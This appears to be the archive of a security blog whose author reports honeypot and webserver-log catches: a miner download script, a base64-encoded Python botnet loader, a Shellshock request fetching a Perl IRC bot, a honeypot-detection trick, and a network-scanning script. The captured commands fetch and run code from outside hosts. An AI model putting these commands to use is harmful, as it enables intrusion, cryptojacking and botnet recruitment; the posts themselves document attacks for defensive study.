Author Archive

sumokoin – cryptonight

Tuesday, February 27th, 2018

Another honeypot-entry catched my eye. First, the attack
itself was unusual because the malware download was executed
by a small python script instead of just running wget or curl:

uname -a
rm -f /tmp/run
if [ ` getconf LONG_BIT ` -eq 64 ]
then u=”http://www.bizqsoft.com/tp2/r6.log”
else u=”http://www.bizqsoft.com/tp2/r.log”
fi
wget -O /tmp/run
curl -o /tmp/run
python -c “import urllib;urllib.urlretrieve(‘$u’,’/tmp/run’)”

Looking into the downloaded binary one finds this miner for
the cryptocoin “sumokoin” using the “cryptonight” algorithm:

{“algo”:”cryptonight”,”av”:0,”background”:false,”colors”:true,”cpu-affinity”:nul
l,”cpu-priority”:null,”donate-level”:5,”log-file”:null,”max-cpu-usage”:75,”print
-time”:60,”retries”:5,”retry-pause”:5,”safe”:false,”syslog”:false,”threads”:null
,”pools”:[{“url”:”pool.sumokoin.hashvault.pro:80″,”user”:”Sumoo6Au3wBiUakx2yC748
Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon”,”
pass”:”x86_64″,”keepalive”:true,”nicehash”:false},{“url”:”pool.sumokoin.com:3333
“,”user”:”Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrY
r8pUpDkhG5MHUjf7XX64WoxR4kxon”,”pass”:”x86_64″,”keepalive”:true,”nicehash”:false
},],”api”:{“port”:0,”access-token”:null,”worker-id”:null}}

(see https://coinmarketcap.com/currencies/sumokoin/ )

Looking into the blockchainexplorer I currently find no transactions linked
to that address, but that may be because of the nature of sumokoin ..

Linux Botnet

Wednesday, January 10th, 2018

another nice ssh honeypot-catch:

uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC
AgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYW
dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &

That downloads a base64-encoded complete python-program from  http://k.zsw8.cc/Api/

In that program a crontab-entry is made

   if runCodePath not in crontabData:
                f = open("/etc/crontab", "a+")
                f.write("\n0 */6 * * * root %s\n" % runCodePath)

then it loads data about the hacked server to the herder:

   my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
            f = urllib.urlopen(apiURL, urllib.urlencode(my_data))

and waits for commands:

 

  if data.has_key("download") and data["download"]:
                    DownExec(data["download"], task_id)
       if data.has_key("cmd") and data["cmd"]:
                    CmdExec(data["cmd"], task_id)

Wonder what would happen if the computer name would be a beef-xss hook or something..?

Chinese hackers

Thursday, May 4th, 2017

Recently on a firewall log: 1 million deny entries PER DAY from china ..

Every day .. ~ 1 million deny entries with source in China.

Can’t we just ban them from the internet?

 

Honeypot detection

Wednesday, April 26th, 2017

My honeypots are sending out complaints on every single successful login.

Recently I saw the following logged entry in the complaint:

echo -en “\\x31\\x33\\x33\\x37”
cat /bin/ls

Now neither kippo nor cowrie as sshd-honeypots have the file “/bin/ls” which could be looked at,  so a  ‘cat /bin/ls’ just result in a :

‘cat: /bin/ls: No such file or directory’

So this seems to be an easy and reliable way to test for a standard sshd-honeypot..
No wonder that \\x31\\x33\\x33\\x37 just translates to “1337”, which I interpret as a smiley left by the hacker ..

RSA broken?

Thursday, February 25th, 2016

Via twitter i was directed to

https://www.linkedin.com/pulse/rsa-beginning-end-william-buchanan

(Thanks @Andrea for retweeting)

and saw a really fascinating approach to break RSA by pre-calculated prime factors.

Here is an online RSA-cracker:

http://asecuritysite.com/encryption/crackrsa?n=89%2C070%2C570%2C720%2C149%2C060%2C561%2C995%2C361%2C437%2C269%2C869%2C694%2C609%2C685%2C454%2C824%2C674%2C559

 

(cracking N=8907057072014906056199536143726986969460968545482 )

Wondering what will come next..

 

remote website screenshots

Tuesday, January 12th, 2016

Recently I wanted to check, if and what kind of webpages are available in a specific ip-address range. So I decided to scan the ips and make screenshots of the found services. Not as professional as archive.org or similar .. just a short look to get an idea. Problem was, that there was no tool which I just could fire up. So I started frickling some scripts ..

Step 1: scan the ip-range. I used nmap (what else) and logged the results in a file.

 nmap --open -p80,443 --host-timeout 3 --max-retries 2 172.16.0.0/16 > ll

That went quite fast.. Took only a few minutes. After that I started a small script for cleaning the result:

#!/bin/bash
grep -i "skipping" *ll > sl
awk '{ print $4}' < sl | sed s/\(// | sed s/\)// > sl2
grep "report for" *ll > l
awk '{ print $NF}' < l | sed s/\(// | sed s/\)// > l2
for i in ` cat sl2`
do
 grep -v $i l2 > xx
 mv xx l2
done
 
./l.sh
./i.sh

Okay .. here is the l.sh and i.sh:
l.sh: (start TOR first .. don’t want to annoy someone..)

for i in `cat l2`
do
torsocks wget –convert-links -B http://$i –no-check-certificate -t 1 -T 2 -O $i.html $i ; xvfb-run — wkhtmltopdf $i.html $i.pdf
torsocks wget –convert-links -B https://$i –no-check-certificate -t 1 -T 2 -O $i-443.html https://$i ; xvfb-run — wkhtmltopdf $i-443.html $i-443.pdf
done

Needed some tries with wget until I had an acceptable result. Played around with “-p” and “-r -l 1” and “-E” and  “-K” .. that one with just the -B worked best for me. So had the html-files.. but I wanted to have a quick look at them and did not want to start browsing local files. Therefore I transformed the html-files to pdf, and then (in the next step) I used convert to get png – files. (Did not find any html-to-png tools)

i.sh :

for i in `ls *pdf`
do
  convert $i `basename -s .pdf $i`.png 
done

(After that: copy the png-files to a place of your choice.., generate thumbnails..scroll around…)

There are some commcial vendors for services like this with much better quality (including zoomable thumbnails, galeries..you name it) but I wanted to have a quick’n dirty solution for free..

Though I am pretty sure that there are much better tools and hundred better solutions this worked for me.

~7000 ssh logins

Tuesday, January 5th, 2016

recently I looked in some honeypot results – ending in finding of the URL

http://185.62.190.222/r1

(Warning: without the /r1 you are forced into a fake Adobe update).

Looking around further I found (besides some scanner-tools, code..) two files stage1 and stage2 under the subdir /r4 ,  containing about 7000 username:password:ip-address combinations. And yes, I found some of my honeypot addresses in there 🙂 Though I am pretty sure that most of the addresses will be honeypots I will try to send out mails to the appropriate abuse-contacts; maybe some of them are for real.

recently in the webserver log ..

Monday, August 17th, 2015

While strolling through the webserver-logs, I found this little asshole..:

78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi
HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch
http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl
fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""

fix.pl installs an irc-connection and waits for commands like
portscan, tcpflood or a reverse shell ..

Looks like there are still servers out there which are vulnerable to shellshock ..

So you want to be a darknet drug lord ..

Thursday, April 16th, 2015

..is the title of an article a user named “th3j35t3r” published on pastebin.

Here is the Link to the interesting article

Starwars in the office

Monday, January 5th, 2015

Now here is a funny movie what happens in an office when nerds get attacked..

https://t.co/JIBMlNs4ei